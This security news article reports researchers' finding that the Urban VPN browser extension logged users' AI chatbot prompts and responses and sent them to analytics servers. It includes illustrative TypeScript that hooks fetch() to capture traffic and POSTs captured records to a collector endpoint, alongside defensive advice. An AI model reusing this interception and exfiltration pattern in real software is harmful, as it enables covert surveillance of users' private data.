Urban VPN Browser Extension Caught Logging AI Chatbot Conversations

CyberSecureFox 🦊

Researchers from Koi Security have reported that the popular VPN browser extension Urban VPN Proxy, installed by millions of users, was silently intercepting users' conversations with AI chatbots, including ChatGPT, Claude, Gemini and Copilot, and exfiltrating this data to external analytics servers.

Urban VPN’s “Recommended” Browser Extension Under Scrutiny

Urban VPN markets itself as “the most secure free VPN for accessing any website” and enjoys a rating of around 4.7 in the Chrome Web Store, with more than 6 million installs. In the Microsoft Edge Add-ons store, it has over 1.3 million installations. Several additional extensions from the same developer collectively add more than 8 million users to the ecosystem.

A key trust factor is that many of these extensions carry the “Recommended” badge in both the Chrome Web Store and Edge Add-ons. Users often interpret this badge as a signal of enhanced security and compliance with best practices, which strongly influences installation decisions.

How the Urban VPN Extension Collected AI Chatbot Data

According to Koi Security, version 5.5.0 of Urban VPN Proxy, released on 9 July 2025, introduced new functionality that enabled data collection from AI platforms by default. The extension added dedicated JavaScript modules for various services, such as chatgpt.js, claude.js, gemini.js, and others targeting different chatbots.

When users opened the corresponding AI services in the browser, these scripts were injected into the page and hooked core browser networking APIs, specifically fetch() and XMLHttpRequest. By wrapping or overriding these APIs, the extension could inspect every outbound request and inbound response before they reached the AI provider or were rendered in the user’s session.
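
The sketch below illustrates, in simplified TypeScript, how an injected page script can wrap fetch() to read request and response bodies before handing control back to the page; XMLHttpRequest can be hooked analogously by overriding its prototype methods. This is a generic illustration of the technique under stated assumptions, not Urban VPN's actual code, and the forwardToCollector helper and all other identifiers are hypothetical.

    // Simplified sketch of fetch() interception by an injected page script.
    // forwardToCollector and every identifier below are hypothetical; this is
    // a generic illustration of the technique, not the extension's real code.

    const originalFetch = window.fetch.bind(window);

    async function forwardToCollector(record: {
      url: string;
      requestBody: string | null;
      responseBody: string;
    }): Promise<void> {
      // Placeholder: a real collector would POST `record` to a remote server.
      console.debug("captured", record);
    }

    window.fetch = async (input: RequestInfo | URL, init?: RequestInit): Promise<Response> => {
      const response = await originalFetch(input, init);

      // Clone the response so the page still receives an unconsumed body stream.
      const copy = response.clone();
      const url =
        typeof input === "string" ? input :
        input instanceof URL ? input.toString() :
        input.url;

      copy.text()
        .then((responseBody) => {
          const requestBody = typeof init?.body === "string" ? init.body : null;
          void forwardToCollector({ url, requestBody, responseBody });
        })
        .catch(() => { /* ignore bodies that cannot be read as text */ });

      return response;
    };

Because the wrapper returns the original response untouched, the page behaves exactly as before, which is what makes this kind of interception hard for users to notice.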

As a result, the extension collected a broad set of sensitive data, including user prompts, chatbot responses, session identifiers, timestamps, platform information, and the specific AI model in use. This data was then transmitted to remote endpoints at analytics.urban-vpn[.]com and stats.urban-vpn[.]com, enabling large-scale logging of AI-related activity.
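
To make that field list concrete, the following hypothetical record type mirrors the categories of data described by the researchers. The interface and function names are illustrative assumptions, and the endpoint argument merely stands in for the reported analytics hosts.

    // Hypothetical shape of a captured record, mirroring the field categories
    // described in the report; every name here is an illustrative assumption.
    interface CapturedAIRecord {
      prompt: string;      // text the user submitted to the chatbot
      response: string;    // text returned by the AI service
      sessionId: string;   // identifier tying messages to one conversation
      timestamp: number;   // Unix epoch milliseconds
      platform: string;    // e.g. "chatgpt", "claude", "gemini"
      model: string;       // specific AI model reported by the page
    }

    // Illustrative exfiltration call; `endpoint` stands in for the reported
    // analytics.urban-vpn[.]com and stats.urban-vpn[.]com hosts.
    async function sendRecord(endpoint: string, record: CapturedAIRecord): Promise<void> {
      await fetch(endpoint, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(record),
      });
    }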

Privacy Policy Changes and the Role of BIScience

An updated Urban VPN privacy policy dated 25 June 2025 explicitly referenced the collection of data from AI chats. The stated purposes included improving the product’s Safe Browsing features and conducting marketing analytics. The document emphasised that data would be processed only in an “anonymised and aggregated” form.

Koi Security, however, highlighted a critical detail: one of the partners receiving this data is BIScience, the company that owns Urban Cyber Security, the brand behind Urban VPN. BIScience specialises in advertising analytics and brand monitoring, and according to the researchers, it receives “raw”, non-anonymised datasets that can then be used for commercial insights and potentially shared with other business partners.

As early as January 2025, an independent security researcher had accused BIScience of using SDKs embedded in partner extensions to collect users' browsing histories, relying on vague wording in privacy documents. At that time, it was noted that BIScience and affiliates relied on exceptions to Chrome Web Store's Limited Use policy, justifying access to sensitive data under the pretext of "delivering core functionality".

AI Protection or Large-Scale Monitoring?

Urban VPN promoted an AI-specific security feature branded as “AI protection”. It promised to scan prompts for personal data and examine AI responses for suspicious links, warning users if there were potential risks. Conceptually, such safeguards could help users avoid accidentally leaking sensitive information to AI platforms.

Koi Security’s analysis, however, showed that the underlying data collection logic operated regardless of whether the AI protection option was enabled. The warning pop-ups served primarily as user-facing messaging about risk, while the actual prompts, responses and related metadata were simultaneously forwarded to Urban VPN’s servers and, by extension, to its analytics partner.
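
The pattern the researchers describe can be summarised in a few lines: the toggle gates only the warning UI, while logging runs unconditionally. All names in the sketch below are hypothetical and serve only to illustrate that decoupling.

    // Hypothetical illustration of the decoupling Koi Security describes:
    // the user-facing toggle controls only the warning, not the logging.
    interface Settings {
      aiProtectionEnabled: boolean;
    }

    function showWarning(message: string): void {
      console.warn(message); // stand-in for the extension's warning pop-up
    }

    function logConversation(prompt: string, response: string): void {
      console.debug("logged", { prompt, response }); // stand-in for server upload
    }

    function handleAIMessage(settings: Settings, prompt: string, response: string): void {
      // The toggle only decides whether the user sees a warning...
      if (settings.aiProtectionEnabled && /password|api[_-]?key/i.test(prompt)) {
        showWarning("Your prompt may contain sensitive data.");
      }
      // ...while collection happens regardless of the toggle's state.
      logConversation(prompt, response);
    }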

Systemic Risks of Browser Extensions in Chrome and Edge

Koi Security identified similar AI-related data collection mechanisms in three additional extensions from the same developer for Chrome and Edge, collectively installed more than 8 million times. Nearly all of these extensions carried the Recommended badge in the official stores, except for one Ad Blocker product.

This case illustrates a structural issue in the browser ecosystem: recommendation badges and baseline store review are not sufficient guarantees of privacy. Extensions with powerful permissions—such as the ability to read and modify data on all websites or intercept network traffic—can implement sophisticated monitoring logic that is difficult for non-experts to detect, especially when it is buried in obfuscated or dynamically loaded code.

Why AI Chatbot Data Is Especially Sensitive

Conversations with AI systems often include highly confidential content: draft contracts, source code, internal policies, incident reports, financial models or personal data about employees and customers. When both the AI provider and third-party extensions log this content, it greatly increases the attack surface for data breaches, profiling and regulatory non-compliance (for example, in relation to GDPR or other privacy laws).

Practical Steps to Reduce Extension-Related Risks

For individuals and organisations, this incident underscores the need for strict browser extension hygiene:

  • Minimise the number of extensions and remove anything not strictly necessary.
  • Review requested permissions and avoid extensions that demand access to “all sites” or full browsing data unless absolutely required.
  • Separate work and personal browsing into different profiles or browsers to limit cross-exposure of sensitive data.
  • Regularly audit installed extensions, especially after updates to permissions or privacy policies; a simple audit sketch follows this list.
  • Avoid pasting confidential information into AI prompts unless there is a clear, contractual data protection framework in place.
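
For the auditing step, a small script along the lines of the sketch below can enumerate installed extensions and flag those with broad host access. It assumes Chrome's chrome.management API (which requires the "management" permission, so it must run from an extension or its DevTools console) and the @types/chrome typings; the heuristic for "broad access" is an intentionally simple assumption.

    // Sketch of a permission audit via chrome.management; requires the
    // "management" permission and assumes @types/chrome typings.
    async function listBroadHostAccessExtensions(): Promise<void> {
      const extensions = await chrome.management.getAll();

      for (const ext of extensions) {
        const hosts = ext.hostPermissions ?? [];
        // Simple heuristic: flag patterns that grant access to every site.
        const broad = hosts.some((h) => h === "<all_urls>" || h.startsWith("*://*/"));
        if (ext.enabled && broad) {
          console.log(`${ext.name} (${ext.id}) has broad host access:`, hosts);
        }
      }
    }

    void listBroadHostAccessExtensions();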

The Urban VPN episode demonstrates that even popular, highly rated and officially “recommended” extensions can become tools for mass collection of sensitive information. When interacting with AI chatbots, it is prudent to assume that any text entered into a prompt may be logged and analysed by multiple third parties—at the AI provider level and within the browser itself. Strengthening extension governance, reducing unnecessary permissions and treating AI chats as inherently non-private channels are essential steps for improving cybersecurity and safeguarding both personal and corporate data.
